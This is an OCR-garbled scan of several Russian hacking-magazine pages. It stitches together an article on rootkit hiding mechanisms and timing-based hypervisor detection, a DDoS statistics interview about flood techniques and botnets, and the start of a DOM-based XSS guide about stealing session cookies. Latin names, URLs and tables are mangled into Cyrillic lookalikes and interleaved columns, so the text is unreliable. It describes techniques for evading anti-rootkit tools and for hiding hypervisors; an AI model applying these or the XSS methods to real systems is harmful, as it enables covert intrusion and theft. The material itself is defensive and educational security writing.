в чем преимущества и недостатки каждого из них. На сегодня 
наш экскурс в общую теорию закончен. 

В следующей статье подробно разберем динамиче- 
скую бинарную инструментацию, как наиболее мощную 
и универсальную, на примере программных библиотек РИМ, 
Оупато НО, Бупп${ и Мата. Продолжение, как говорится, 
следует... = 
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Рассматриваем современные тенденции 
развития руткитов и методы их обнаружения 


В настоящее время очевидно смещение вектора компьютерных атак от массового зараже- 

ния к целевым, точечным атакам. Как сказал Е. Касперский: «Девяностые были десятилетием 
киберхулиганов, двухтысячные были десятилетием киберпреступников, сейчас наступила эра 
кибервойн и кибертеррора». Иллюстрацией этому являются всем известные примеры: Зфихп\, 
Оиаи, Натег, Саи$$, которые многие антивирусные компании причисляют к кибероружию. 


Игорь Коркин 
190г.Кокт@дтай.сот, 
@Идотогкт 


ОСНОВНЫЕ ТЕНДЕНЦИИ 

ВКОМПЬЮТЕРНОИ БЕЗОПАСНОСТИ 

Одним из ярких примеров использования кибероружия может 
служить шпионская сеть «Красный октябрь», которая пять лет 
активно добывала информацию из правительственных орга- 
низаций, различных исследовательских институтов, крупных 
международных компаний. Серьезная защищенность этих объ- 
ектов не остановила работу вредоносной системы. Она была 
раскрыта всего несколько месяцев назад, что свидетельствует 
о возрастающей угрозе вмешательства в работу любой ком- 
пьютерной системы. 

Для обеспечения устойчивого и неопределяемого при- 
сутствия в компьютерной системе вредоносное программное 
обеспечение (ВПО) использует специальные механизмы, назы- 
ваемые руткит-механизмами. В результате ВПО работает неза- 
метно как для пользователя, так и для средств защиты. 

Казалось бы, разработчики ОС должны всеми силами про- 
тивостоять сокрытию нелегитимного ПО, однако появление 
новой версии \\ЛИпдом/$ не изменило ситуацию в лучшую сторо- 
ну. Восьмерка переняла от своих предшественников часть уже 
знакомых механизмов защиты (ЧАС, АЗЁЬВ, ОЕР, РасйСчага, 
цифровые подписи для драйверов), для которых существует 
возможность обхода. И представила несколько новых — Зесиге 
Воот, ЗМЕР и ЕЁАМ, которые, однако, не сильно повысили 


уровень защищенности. О чем свидетельствуют демообразец 
буткита Зюпед йе Питера Кляйсснера и ЧЕЛ Боски Андреа Ал- 
лиеви. А о возможности обхода технологии ЭМЕР на \М/паом$ 8 
уже писал А. Шишкин из компании РозИме Тесппоюд!ез. 

Исходя из сказанного, можно сделать вывод, что в послед- 
ней версии М/Ипао\м5 для борьбы с ВПО ничего революционно 
нового не было внедрено, и достойных механизмов, способных 
сильно осложнить жизнь разработчикам руткитов, на сегод- 
няшний момент нет. 


МЕХАНИЗМЫ СОКРЫТИЯ В СИСТЕМЕ 

Для сокрытия ВПО могут применяться различные методы. 
Впервые классификация механизмов сокрытия была выпол- 
нена Йоанной Рутковской в работе птодистда З{еаНй Мамаге 
Тахопоту. Предложенная ею классификация может быть рас- 
ширена следующим образом (см. рис. 1). 

Стеганографические механизмы скрывают истинное пред- 
назначение внедренных объектов маскировкой их под леги- 
тимные, например схожестью их имен с именами системных 
файлов. В результате вредоносные файлы видны пользователю, 
но не вызывают у него подозрения. Пример стеганографическо- 
го сокрытия — использование сертификатов доверенных компа- 
ний для подписи вредоносных драйверов. Благодаря действи- 
тельным сертификатам компаний Веакек и /Мгсгоп червь Зихпет 
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Руткит-механизмы 


Стеганографические 
механизмы 


Механизмы, работающие 
«внутри» ОС 


Изменение 


структур 
памяти 


Изменение 
пути 
выполнения 


Механизмы, 
основанные 
нарежиме \Т 


Технические механизмы 


Механизмы, 
работающие «вне» ОС 


Механизмы, 
основанные 
нарежиме ММ 


Механизмы, использующие 
дополнительное аппаратное 
обеспечение 


долгое время оставался незамеченным, а компоненты червя 
Нате имели цифровую подпись самой компании Мсго$08. 

Для работы стеганографических механизмов не требуется 
повышенных привилегий, также они переносятся на различные 
версии ОС \\пао\м/$. Однако из-за отсутствия технических ме- 
ханизмов сокрытия такое ВПО может быть легко обнаружено 
и удалено. Большую опасность представляют комбинации сте- 
ганографических с другими механизмами сокрытия. 

Ко второй группе относятся технические механизмы сокры- 
тия, в результате работы которых информация о скрываемом 
объекте становится недоступной средству обнаружения («не 
виден объект, значит, его и нет»). Эти механизмы можно раз- 
делить на руткит-механизмы, работающие «внутри» и «вне» ОС. 

В случае руткит-механизма «внутри» ОС объектом может 
выступать процесс, драйвер, файл на диске, сетевой порт, ключ 
в реестре. Для своей работы руткит-механизмы могут изменять 
как пути выполнения, так и структуры памяти, как в пользова- 
тельском, так и в системном адресных пространствах. 

Для изменения пути выполнения ВПО перехватывает функ- 
ции штатного обработчика и передает управление вредоносно- 
му обработчику, который вносит целенаправленные изменения 
в возвращаемый результат. Способы обнаружения описанного 
механизма сокрытия уже освещались на страницах журнала. 

Вторая подгруппа руткит-механизмов, работающих «вну- 
три» ОС, не добавляет новых обработчиков в систему, а осо- 
бым образом изменяет структуры памяти, хранящие ин- 
формацию о скрываемом объекте. Примеры таких структур, 
расположенныхвсистемномадресномпространствеипредстав- 
ляющих интерес для руткитов: _КАРСВ, _ЕТНАЕАО, _ЕРРОСЕЗ5, 
_МОБЧЕЕ_ЕМТВУ, _ОРМЕА_ОВФЕСТ, плюс БД зарегистрирован- 
ных драйверов и служб, расположенная в пользовательском 
пространстве процесса ЗЕА\У!СЕЗ.ЕХЕ. 

Руткит-механизмы «вне» ОС основаны на установке соб- 
ственного или модификации существующего обработчика 
событий в том или ином режиме работы процессора либо до- 
полнительного аппаратного обеспечения. Для работы этих 
механизмов зачастую необходимо наличие набора микросхем 
с поддержкой требуемой технологии. Можно выделить руткит- 
механизмы, построенные на основе режима аппаратной вир- 
туализации, режима системного управления и кода, исполь- 
зующего технологии Асйуе Мападетепт Тесппооду и \У-РРО. 
Широко известный в узких кругах автор А_Т Т в своих работах 
«Кремневый беспредел» описывает возможности и угрозы ин- 
формационной безопасности не только от указанных техноло- 
гий, но и от механизма обновления микрокода процессора (5й. 


у/ВОО60О и Ьи.1у/104Е$ВВ). 


АНТИРУТКИТЫ 

Большинство вредоносных средств, о которых шла речь ра- 
нее, использовали для своей работы драйверы. В связи с этим 
давай рассмотрим наиболее распространенные антируткит- 


Рис. 1. Схемакласси- 
фикации механизмов 
сокрытия программно- 
го обеспечения 


Рис. 2. Схема взаимо- 
действия операцион- 
ной системы с аппарат- 
ным обеспечением при 
отсутствии (присут- 
ствии) двух гиперви- 
зоров: легитимного 

с функциями монитора 
виртуальных машин 
инелегитимного, на- 
ходящихся во вложен- 
ном виде 
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средства, способные обнаруживать наличие скрытых драйве- 
ров. 

Из популярных внештатных средств, поддерживающих ра- 
боту с \ММпаом$ 8, можно выделить следующие: Стег, Хиету, 
Роме! Тоо!, ТОЗЗКИег (Казрег®Ку 1аб5). 

С позиции обнаружения скрытых драйверов средства СОтег, 
Хиет! и Роме!Тоо! имеют схожие алгоритмы работы, использу- 
ющие для обнаружения побайтовый поиск в памяти фрагмен- 
тов структур драйверов. Средство ТОЗЗКИег для обнаружения 
драйверов использует несколько иной список, информация 
в который заносится при загрузке драйверов через штатные 
средства \\ММпао\5. 

Изменение полей в необходимых структурах и удаление 
из соответствующих списков обеспечит сокрытие драйвера 
от этих средств, без нарушения работы системы и самого ВПО. 
Это позволяет констатировать отсутствие в открытом доступе 
антируткитных средств, стойких к противодействию. 


ПРОГРАММНО-АППАРАТНЫЕ РУТКИТЫ 
Программно-аппаратные руткиты функционируют «вне» ОС. 
Наиболее интересны экземпляры, построенные на основе 
технологии аппаратной виртуализации. Почему? Во-первых, 
их можно установить с помощью драйверов — штатного меха- 
низма различных ОС. Во-вторых, такие руткиты могут перехва- 
тывать события более высокого уровня, чем другие. В-третьих, 
они лучше документированы. Поэтому с ними мы познакомим- 
ся поближе. 

С 2006 года компании 1! и АМБЬ начали выпускать про- 
цессоры с поддержкой технологии аппаратной виртуализации. 
ПО, использующее технологию аппаратной виртуализации (или 
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система 


Аппаратное 
обеспечение 


ПК без гипервизора 


Виртуальная Виртуальная 
машина 1 машина? 
Операционная Операционная 
система 1 система2 
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Нелегитимный гипервизор 
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ПК под управлением двух гипервизоров 
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ностях передается в структуре НУ СРУШ ВЕЗУТ. Однако такой 
способ не защищен от компрометации. 

Несмотря на широкую распространенность гипервизоров, 
штатные средства для их обнаружения отсутствуют, а опубли- 
кованные имеют существенные недостатки: невозможность 
Проактивные Сигнатурные выявить гипервизор в случае его противодействия обнару- 
жению, а также неудобство использования и тиражирования 
ряда средств. Под удобством тиражирования понимается от- 
сутствие в средстве обнаружения внешнего аппаратного ком- 
понента, необходимого на протяжении всего времени работы. 

В связи с широким распространением различного ПО, ис- 

а а пользующего технологию аппаратной виртуализации, особую 
ассоциативнои ассоциативнои } 

трансляции трансляции На основе аппаратных опасность представляет нелегальный гипервизор, который 

Е для своего сокрытия использует легитимный с помощью вло- 

а а женной виртуализации. В открытых источниках нет сведений 
буфера стековых ошибокв ПОАВ Наоснове программных о способах обнаружения нескольких вложенных гипервизоров. 

возвратов ипроцессорах средств 


Способы обнаружения ПОАВ 


Наоснове 


Временные Поведенческие 
р =“. доверенного МВМ 


ОБЗОРИ КЛАССИФИКАЦИЯ СПОСОБОВ 


Наосновесписка ОБНАРУЖЕНИЯ ГИПЕРВИЗОРОВ 
демаскирующих Вопрос обнаружения гипервизоров уже неоднократно обсуж- 
событий дался. На рис. 3 представлена классификация способов обна- 
ружения гипервизоров, согласно которой все способы делятся 
Наоснове на проактивные и сигнатурные. 


обращения Временные способы обнаружения основаны на том, 
Ве что статистики времени обработки заданных событий гостевой 
ОС существенно зависят от того, загружен гипервизор или нет: 
в присутствии гипервизора длительность обработки событий 
значительно больше. Эта особенность была использована това- 
просто гипервизор), работает в новом режиме, более приви- Рис. 3. Классификация рищем В Т Т при обнаружении китайского гипервизора (15.44/ 
легированном, чем ОС. Технология аппаратной виртуализации способов обнаружения ЧХодЕ7). Она позволяет сравнительно просто выявлять гиперви- 
позволяет запускать во вложенном виде несколько различных гипервизоров зоры только в тех случаях, если нарушитель не предпринял меры 
гипервизоров. для их сокрытия. В ситуациях, когда осуществляется целена- 
С одной стороны, гипервизор, выполняющий функции мо- правленная компрометация счетчика либо временная выгрузка 
нитора виртуальных машин, повышает сервисные возмож- гипервизора из памяти (так называемая технология ВиеСШскеп, 
ности компьютера и снижает его эксплуатационные расходы. которая использовалась в ВмеР!)), известные временные спосо- 
Благодаря ему на одном компьютере может быть одновре- бы не позволяют обнаружить гипервизор. Детальное описание 
менно запущено несколько ОС в разных виртуальных машинах и сравнительный анализ указанных способов обнаружения 
(рис. 2). представлены в работе БИ.уЛк_ухоите. Мы же уделим внима- 
Но, с другой стороны, можно негласно внедрить гиперви- ние временному способу обнаружения с использованием спи- 
зор — программную закладку, которая обладает бесконтроль- ска демаскирующих событий. 
ными возможностями и несет угрозу инфобезопасности. Для выбранного способа таким событием гостевой ОС бу- 
В открытом доступе имеются два программных средства — дет выполнение инструкции, при котором управление всегда 
ВучеРИ и \У{по|, реализованные в виде драйверов, которые передается из ОС гипервизору. Одной из таких инструкций 
устанавливают гипервизор прозрачно для пользователя. является СРУЮ. Система обнаружения гипервизоров, которая 
Обнаружением гипервизоров занимались как целые ком- будет описана далее, использует именно этот способ. 
пании (Котоки, Мощи Зесищу ЁГаб$ и другие), так и отдельные Чтобы оценить каждый из методов, были проанализированы 
специалисты. Даже сама компания Мсго$оЙ опубликовала ин- средства обнаружения гипервизоров (табл. 1). Под не скрытым 
терфейс для обнаружения гипервизоров, согласно которому гипервизором подразумевается отсутствие в этом образце 
необходимо выполнить инструкцию СРУШЮ, предварительно компонента, обеспечивающего противодействие обнаружению. 
записав в регистр ЕАХ единицу. Далее необходимо проверить Под скрытым образцом подразумевается наличие в этом образ- 
значение 31-го бита регистра ЕСХ; если он выставлен, то в си- це такого компонента. В табл. 1 знаки «+» и «—» показывают на- 
стеме присутствует гипервизор, а информация о его возмож- личие (отсутствие) указанной характеристики соответственно. 


Возможность обнаруже- Удобство Обнаружение 
Наименование средства Способ обнаружения гипервизора ния гипервизора использования нескольких 
не скрытого | скрытого |Итиражирования гипервизоров 
+ 


+ 


м = Ри 
+ -- = - 


Таблица 1. Сравнение средств обнаружения гипервизоров 


Нурегза\ Воски Ощецог 
(Мой Зесигйу [абз$, 2007-2011) 


бутащес Епарош1 Рг4есйоп 
12.120 


Оеер\М/асп (Булыгин Ю., 2008) Сигнатурный на основе аппаратных средств 
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Защищенный режим Режим системного 


(В-режим) В$М управления ($-режим) 


б УМЕтмхгу 


Режим гостевой 
машины (В-режим) 


Режим монитора 
виртуальных машин 
(У-режим) 


Режим системного 
управления ($.-режим) 


Режим системного 
управления ($-режим) 


По результатам проведенного анализа видно, что существу- 
ющие способы обнаружения гипервизоров обладают рядом 
недостатков: 

. временные способы не позволяют выявить гипервизоры 
в случае использования компрометации счетчика тактов 
либо временной выгрузки из памяти; 

. поведенческие способы не могут обнаруживать новые ги- 
первизоры и неработоспособны на новых моделях процес- 
соров; 

. способы на основе доверенного монитора виртуальных 
машин уязвимы к атаке «человек посередине» («тап-т-Пе- 
ша»); 

. сигнатурные аппаратные средства неудобны в использова- 
нии и тиражировании, а программные средства нестойки 
к противодействию гипервизора; 

. опубликованные способы и средства обнаружения не по- 
зволяют обнаружить несколько вложенных гипервизоров. 


Далее представлена авторская методика обнаружения не- 
легитимного гипервизора, которая лишена указанных недо- 
статков. Будет рассматриваться гипервизор, который может 
быть внедрен с помощью: 

. установки драйвера операционной системы; 
. модификации главной загрузочной записи жесткого диска; 
. внесения изменений в ВО5. 


При этом учитывается, что реализованный нарушителем ги- 
первизор может противодействовать обнаружению посредством 
компрометации процессорного счетчика тактов, временной де- 
инсталляции из памяти, а также предотвращать получение копии 
дампа памяти, содержащей структуры гипервизора. 


ПРЕДПОСЫЛКИ ДЛЯ ОБНАРУЖЕНИЯ 

Чтобы выявить факторы, которые могут быть использованы 
для обнаружения гипервизора, был проведен сравнительный 
анализ работы процессора с поддержкой аппаратной виртуа- 
лизации при выполнении набора безусловно перехватываемых 
гипервизором инструкций в случаях его отсутствия и присут- 
ствия (рис. 4, аи 4, 6). 

В случае присутствия гипервизора возрастает не только 
абсолютное время выполнения трассы, но и значения стати- 
стических характеристик длительности выполнения, например 
дисперсии. Эта отличительная особенность и легла в основу 
предлагаемой методики обнаружения (подробный анализ схем 
переключения между режимами работы процессора и матема- 
тическое обоснование можно посмотреть тут: БИ.1у/1ОпРРМ). 


МЕТОДИКАОБНАРУЖЕНИЯ ИЕЕ АНАЛИЗ 
Суть методики обнаружения состоит в расчете и сравнении ста- 
тистических характеристик длительности выполнения трассы 
с пороговыми величинами. 

Измерение длительности выполнения трассы проводилось 
для десяти инструкций СРУШ с помощью процессорного счет- 


Рис. 4. Схемы 
переключения между 
режимами работы про- 
цессора при выполне- 
нии наборабезусловно 
перехватываемых 
инструкций в случаях 
его отсутствия (а) 

и присутствия (6) 


МЕО 


Согласно недавнему 
отчету британской На- 
циональной аудитор- 
ской службы (МАО), 
наблюдается ростчисла 
киберпреступлений, 
которые одной Велико- 
британии обходятся в 
18—27 миллиардов фун- 
тов стерлингов ежегодно 


(5. у/1409ху5). 


ий 


ИНТЕРЕСНАЯ ТЕХНИКА 
СОКРЫТИЯ РУТКИТОВ 


На конференции 2егоМю\м в 2012 году была 
представлена работа Д. Олексюка (ака Сг4$П) 

в которой описывался интересный способ 
размещения руткита не в файлах, а в реестре с 
помощью ОЖегепйаеа Зузчет Безсирноп ТаЫе 
(ОЗОТ). Преимущество данного способа в том, 
что ни одно средство для обнаружения руткитов 


не учитывает такую возможность. 


Создай свой гипервизор 


ИСХОДНЫЕ КОДЫ 
ГИПЕРВИЗОРОВ — 
ДРАИВЕРОВ ДЛЯ 0С 
МИМООМ/$ Х86 


Быстрее и проще всего создать свой гипер- 
визор, взяв за основу один из существующих. 
Поэтому на диске ты сможешь найти следующие 
исходники: 


1 


ВучеРИ (версии 0.11 и 0.32) — демонстра- 
ционный образец гипервизора для систем 
АМО, после публикации которого и началось 
широкое обсуждение угроз ИБ отаппаратной 
виртуализации. 


2. \/Мтхсри — исходный код заглушки гипервизо- 
ра Ш. Эмблтона (51. ЕтЫе оп) для процессо- 
ров 11|, который уже готов к использованию. 

3. шмаБе Гапе (1) — исходный код авторского 


скрытого гипервизора, построенного на осно- 
ве утхсри. Сокрытие осуществляется путем 
компрометации процессорного счетчика 
тактов Т$С, величина компрометации может 
задаваться с точностью до одного такта. 


СРЕДСТВА ОТЛАДКИ 
ГИПЕРВИЗОРОВ 


Специфика работы гипервизора не всегда позво- 
ляет использовать популярные средства отладки, 
такие как \Вох (\УМ\маге) вместе с \\ЛпОбд, вместо 
этого можно использовать эмуляторы ВосП$ или 
АМО ЗитМоми, однако они достаточно сложны вна- 
стройке. 

Что же можно использовать: 


1 


Вывод отладочных сообщений через ОБаРитт 
и просмотр их с помощью Ора\е\м. Правда, 
такой метод можно использовать скорее для 
демонстрации корректной работы гипервизо- 
ра, чем для его отладки. 


2. Отправлять отладочные сообщения на 
СОМ-порт. Этот способ использовали авторы 
ВчеРИ, сохранив в исходнике реализации 
этих функций. 

3. Использовать отладочную плату, например 


«РТ О/адпо$йс Роз Тез Сага Оебид Сага 

РС! Апаутег». При включении компьютера на 
-СО-дисплее этой платы можно будет увидеть 
РОЗТ-сообщения В!О5. 


7$ Взлом 


Уровень 


Тест-статистика 
фильтрации { 


Оперативный, 
на стадии эксплу- 
атации ПК 


Пороговое значение 


Содержание шагов 
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Вероятности ошибок Таблица2.Пороговые 


значения 


Таблица3. Пошаговая 
методика обнаружения 
нелегитимного гипер- 
визора 


4. Начать проверку ПК на отсутствие гипервизора с помощью алгоритма обнаружения 
5. Последовательно установить дополнительное ПО (М$ О се и другое) 
6. Следить за сообщениями об обнаружении гипервизора 


7. Для адаптации средства обнаружения к легитимному гипервизору выполнить шаг 3 


Недостаток методики 


Необходимость получе- 
ния пороговых значений 
на него 


Комментарий / предлагаемое решение 


Таблица 4. Недостатки 
ивозможные решения 
методики обнаружения 


Для работы средства обнаружения необходимо получать пороговые значения. Это типичная прак- 
тика для информационной безопасности — какой-либо уровень считать доверенным и опираться 


чика тактов ТЗС на повышенном 31-м уровне приоритета 1ВО(. 
Результатами опытов являлись матрицы размером 1000 х 10, 
содержащие данные измерений длительности выполнения 
трассы, по которым рассчитывались различные статистические 
характеристики. 

Для иллюстрации в табл. 2 приведены пороговые значения 
последовательной комбинации таких показателей, как дисперсии 
О Ти момента 4-го порядка М +, полученных на различных ПК, 
для случаев отсутствия (ОТ) и присутствия (ПР) гипервизоров. 

В первом столбце табл. 2 номерами обозначены модели 
процессоров обследованных ПК: 

1 — ие! Соге 2 Вио Е8 200 с ОС \ММпдо\м5$ 7, 

2 — ще! Соге 2 Био ЕбЗ00 с ОС ММпаомю 7, 

3 — АМО Рвепот Х4 945 с ОС \ММпао\м$ Ыме СОХР (000). 


В первых двух ПК использовался разработанный автором 
гипервизор (исходный код которого ты можешь найти на дис- 
ке), реализованный в виде драйвера ОС, в третьем случае — 
специализированный гипервизор, получающий управление 
при загрузке ПК из В!О5. 

Предлагаемая методика обнаружения нелегитимного ги- 
первизора состоит из двух этапов: предварительного и опера- 
тивного, как представлено в табл. 3 (детальное описание ме- 
тодики: БИ.УЛК моите). Для противодействия этой методике 
скрываемый гипервизор должен компрометировать показания 
счетчика тактов не на постоянную величину, ана случайную, так, 
чтобы, с одной стороны, уравнять средние длительности вы- 
полнения трассы, а с другой — стабилизировать разброс дли- 
тельностей выполнения трассы. Однако вопрос подбора закона 
распределения такой случайной величины остается открытым. 
Правда, данная методика не лишена и недостатков (табл. 4). 


ВЗГЛЯД В БУДУЩЕЕ 

Все, о чем мы до этого говорили, все эти методики сокрытия 
и обнаружения относятся к сегодняшнему дню. А что нам ждать 
от дня завтрашнего? По какому пути развития пойдут техно- 
логии создания руткитов? Можно дать волю воображению 
и с большой вероятностью предположить, что развиваться они 
будут по следующим направлениям: 


АА 


Интересную работу, 
посвященную ЕЕ |- 
руткитам, но под ОЗ Х, 
выполнил [оика$ К: 


и. 


Реток! 


1. Руткиты в облаках и суперкомпьютерах. Зачастую 
для повышения производительности облачных вычислений 
используют аппаратную виртуализацию. При этом нет ин- 
формации о проверке таких систем на отсутствие нелеги- 
тимных гипервизоров. 

2. Руткиты во встраиваемых системах. Различные встраи- 
ваемые системы получают огромную популярность, это си- 
стемы «Умный дом», «Умный город», системы в автомобилях 
и многие другие. Новая инициатива 1ВМ Зтанег Сфез$ тре- 
бует особого внимания, так как многочисленные компонен- 
ты системы обеспечивают жизнедеятельность множества 
людей, при этом представляя собой добычу для нарушите- 
лей. 

3. Руткиты в мобильных ОС. Внедрение руткитов в мобиль- 
ные операционные системы уже давно не новинка. 

4. Руткиты в виде предустановленного ПО в планшетах. 
Снова упомяну работу ВТ Т, посвященную закладкам 
в военных ноутбуках Ощас (Ь(.1у/5123ЗуР). Там программ- 
ные закладки были выполнены в виде софта от компа- 
нии Сотримаге, именно той, которая выпускала отлад- 
чик ЗОНСЕ. Сейчас аналогичные закладки этой компании 
можно встретить в планшетах. К примеру, новые ТПпКРаа 
2 с продвинутым уровнем защиты продаются уже с пред- 
установленным ПО — «Ещегри$е-!еуе! зеситщу, мий Тгизеа 
Р!аМопт Модие апа Сотршгасе® Мое». 


ИТОГИ 

Как видишь, технологии создания руткитов не стоят на месте, 
делая задачу их обнаружения все сложнее. Это превращает 
их в очень опасное кибероружие, способное оставаться неза- 
меченным, но в нужный момент нанести точный и смертельный 
удар. Понимая всю их опасность, за рубежом создали специ- 
альные компании, занимающиеся исследованиями в области 
сокрытия и обнаружения программных закладок, такие как: 
ОАВРА и 1АВРА (США), ОЗТЕ (Великобритания), ОВОС (Канада), 
СОЗТИМО (Китай). Будем надеяться, что скоро и в нашей стране 
появятся полноценные кибервойска, пока же уровень безопас- 
ности (читай обороноспособность) в военных ведомствах, как 
кажется со стороны, оставляет желать лучшего. = 
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МАКСИМАЛЬНАЯ ПОЛОСА, 
КОТОРОЙ «ЗАЛИВАЮТ» ЖЕРТВУ 
В России большинство компаний используют 
для подключения к мировой сети связку из двух 
аплинков емкостью по 100 Мбит/с или по 1 Гбит/с. 
Таким образом, для гарантированного выво- 
да из строя сетевой инфраструктуры, как пра- 
вило, достаточно обеспечить постоянный по- 
ток в 2 Гбит/с, а в большинстве случаев хватает 
200-250 Мбит/с. Больше просто не требуется. 
Максимальная атака на полосу на одного кли- 
ента в этом году была объемом 6 Гбит/с. Причем 
в данном случае корректнее было бы говорить 
о раска-гже, потому что это был $\М-флуд. Вы- 
сокоскоростной 5Э\УМ-флуд опасен как раз тем, 
что в большинстве случаев дает комбинирован- 
ный эффект: недостаток полосы пропускания 
наслаивается на проблемы с обработкой ТСР- 
соединений, и быстро справиться с такой атакой 
не получится. 


КОЛИЧЕСТВО ИСПОЛЬЗУЕМЫХ РАЗНЫХ 
ТЕХНИК ВО ВРЕМЯ САМЫХ КРУПНЫХ АТАК 
Обычно пять-шесть. Как правило, вначале это ЧОР/ 
[СМР-флуд, потом 5З\УМ-флуд, ТСР соппесйоп флуд 
и, наконец, пара разновидностей атак прикладного 
уровня. Часто различные техники комбинируются 
и атаки разного уровня начинаются одновремен- 
но — у большинства системных администраторов 
ОБо$-атака ассоциируется с флудами сетевого 
и транспортного уровня, в то время как реальный 
урон наносят атаки уровня приложения. В резуль- 
тате в случае комбинированной атаки вначале си- 
стемный администратор занимается не тем аспек- 
том атаки, который создает реальные проблемы. 
Нередки случаи, когда клиент, ставя свой сер- 
вис под защиту, игнорирует наши рекомендации 
и требует полностью отключить фильтрацию уров- 
ня приложения (потомучто он боится, что из-занее 


В среднем столько 
зараженных компьютеров 
входит в ботнет 


загод 


Столько атакбыло 
нейтрализовано 


теоретически могут потерять доступ легитимные 
пользователи из-за ложных срабатываний) и отби- 
вать только высокоскоростные атаки. Как правило, 
когда эта просьба удовлетворяется, выясняется, 
что высокоскоростные атаки были ни при чем. 
Таким образом, за счет комбинированной атаки 
злоумышленнику удается продержать сервис в ле- 
жачем положении лишние полчаса-час, пока наша 
техподдержка общается с клиентом. 


ГОС И 0№$ АМРИЕРСАТ!ОМ 

Доля 1О!С, конечно, выросла, но в целом не- 
велика. «Социальные» атаки обычно приуроче- 
ны к громким событиям, возмутившим сетевую 
общественность. Таких событий в этом году было 
полным-полно, но на общем фоне атак, основан- 
ных на (ОС, было немного. 

Популярность атр!Исайоп-техник сейчас высо- 
ка, но с ростом скоростей будет падать. Организа- 
ция атр!Ийсайоп-атаки подразумевает поиск сер- 
вера, имеющего соответствующую уязвимость, 
а это длительная работа; к тому же такая атака 
создаст проблемы в первую очередь эксплуати- 
руемым серверам. Сейчас запасы канальной ем- 
кости у большинства атакуемых сайтов невелики, 
и постоянное сканирование ОМ$-серверов в поис- 
ках отказоустойчивых источников атр/Йсайоп-атак 
приносит свои плоды; однако ОБо$-атаки — это 
бизнес, а бизнес на исключениях не построишь. 
Проще, быстрее и надежнее купить готовый ботнет 
и зарабатывать на нем деньги, не теряя времени. 


НОВЫЕ ТРЕНДЫ 

Среди трендов прошедшего года можно на- 
звать мимикрию ботов под !Рпопе- и Апагою- 
приложения атакуемых сервисов. Это оправдан- 
но: приложение — это фактически легитимный 
пользователь, однако одновременно с этим при- 
ложение — это программный код, который в кон- 


Максимальная 
мощность атаки в Гбит/с 
(однаизметрик) 


Максимальная продолжи- 
тельность атаки в часах 


79 


У 


Артем 
Гавриченков, 
Ноноа4 ГаБ. 


тексте веб-сайта ведет себя весьма схоже с бо- 
том. Такое поведение легко сымитировать, и его 
непросто отсечь. 


ВРЕМЯ ВКЛЮЧЕНИЯ АТАКИ 

НА ПОЛНУЮ МОЩНОСТЬ 

Атака может активироваться мгновенно. Серьез- 
но, зачастую уже бессмысленно высчитывать те 
миллисекунды, которые отделяют запрос первого 
бота от запроса тысячного, двухтысячного. 

В других случаях атака может начинаться мед- 
ленно и развиваться постепенно. Если рассматри- 
вать незащищенный сервер, то у каждого подхода 
есть свои плюсы и минусы: мгновенная атака — 
это мощный удар по СРИ и оперативной памяти, 
который может отправить сервер в даунтайм на- 
долго за один прием, однако при этом злоумыш- 
ленник фактически «засвечивает» системному 
администратору весь свой ботнет разом. Медлен- 
ная атака создает постоянную фоновую нагрузку 
на сервер, заставляя владельцев сервера либо 
заниматься оптимизацией кода и вычислительных 
ресурсов (что долго и трудоемко), либо непре- 
рывно банить новые 1Р-адреса сутки напролет. Так 
что вопрос скорости «включения» ботнета — это 
скорее вопрос выбора тактики, нежели вопрос 
реализации. Проблем с моментальным «включе- 
нием» всего ботнета, повторюсь, уже давно нет. 


ВРЕМЯ ЖИЗНИ БОТА 

«Текучка кадров» в ботнетах высока. Список 1Р- 
адресов, заблокированных на защищаемом сер- 
висе в апреле, киюню уже скорее вреден, нежели 
полезен. 


СРЕДНЕМЕСЯЧНЫЙ ОБЪЕМ ТРАФИКА, 
КОТОРЫЙ ЧЕРЕЗ СЕБЯ ПРОПУСКАЕТ ОВАТОВ 
По ряду причин — секретная информация :). Ска- 
жем так, эта цифра измеряется петабайтами. == 


Количество ботов в самом 
большом ботнете 


до 


Тотальный гид по РОМ Ва$ед Х$$ 
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Х$$ неспроста стоит в верхней части списка опасностей ОМ/АЗР ТОР 10. Любой толковый 
программист о них знает. Но это не мешает статистике: восемь из десяти веб-приложений 
имеют Х$$-уязвимости. А если вспомнить личный опыт пентестов банков, то более реальной 
представляется картина «десять из десяти». Кажется, тема изъезжена от и до, однако 

есть подвид Х$$, который по разным причинам потерялся. Это — БОМ Вазеч Х$5. 

И как раз о нем я сегодня пищу. 


Алексей «Сгееп)од» 
Тюрин, ОмНа! ЗесигКу 
адггг4о9@дтай.сот, 
{м ег. сот/ащуийп 


СМЕЩЕНИЕ ФОКУСА 

Атаки на клиентов представляют одну из основных проблем 
в безопасности веба. Х$$, СИсКаскта, СЗВЕ — все они на- 
правлены именно против обычных пользователей, а не против 
серверных компонентов систем. И если раньше получить при- 
личный профит можно было, эксплуатируя уязвимости в сер- 
верной части (и проникая внутрь корпоративной сети), то те- 
перь фокус хакеров смещается на клиентскую часть. По этой 
причине Х$$’ки, к которым многие относятся со скепсисом, 
могут сослужить хорошую службу. 


ТО, ЧТО МОЖНО ПРОПУСТИТЬ 

Вначале внесу два пояснения, связанных с данной статьей. 
Первое. Главная цель — познакомить с РОМ Вазеа Х$$ тех 

людей, которые пока обходили этот тип уязвимостей стороной. 

Рассказать о тонкостях эксплуатации, а также поделиться мыс- 


лями о том, как правильно поставить процесс выявления подоб- 
ных уязвимостей. Это своего рода ликбез. Поэтому в зависимо- 
сти оттвоих познаний можешь перескочить тот или иной кусок. 

Теперь второе. С полгода назад Владимир Кочетков написал 
на Хабре отличную статью «Вся правда об Х$$, или почему меж- 
сайтовое выполнение сценариев не является уязвимостью?» 
(а0о.91/т\37М). В ней шла речь о том, что Х$$ — это именно 
атака, а не тип уязвимости. Помнится, это разожгло ряд ожесто- 
ченных споров и «крестовых походов», что очень повеселило... 
Но я буду называть Х$$ и атакой, и уязвимостью, хотя верно ут- 
верждение «Х$$ — тип атаки». Так будет проще, хотя правильно 
понимать смысл, конечно, важно. 


АЗБУКАХ$$ 
Не могу не напомнить, для чего нам нужны ХЗ$’ки. Нет, 
не для того, чтобы выполнить наш уауасир{-код у пользовате- 
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ля. Для этой цели мы можем просто затащить его на полностью 
подконтрольный нам сайт (е\1.сот). 

Задача — выполнить НАШ уауа5сир\-код в браузере поль- 
зователя в контексте атакуемого домена (например, в контек- 
сте дтай.сот). То есть цель — обойти Зате Опат Ройсу, по- 
тому что на ЗОР и стоит почти вся браузерная безопасность. 

Далее, что ХЗЗ'ка нам даст? Конечно, в простейшем слу- 
чае мы просто получаем сессионные куки пользователя. 
Но на самом деле мы можем делать все, что может уауа$ спирт: 
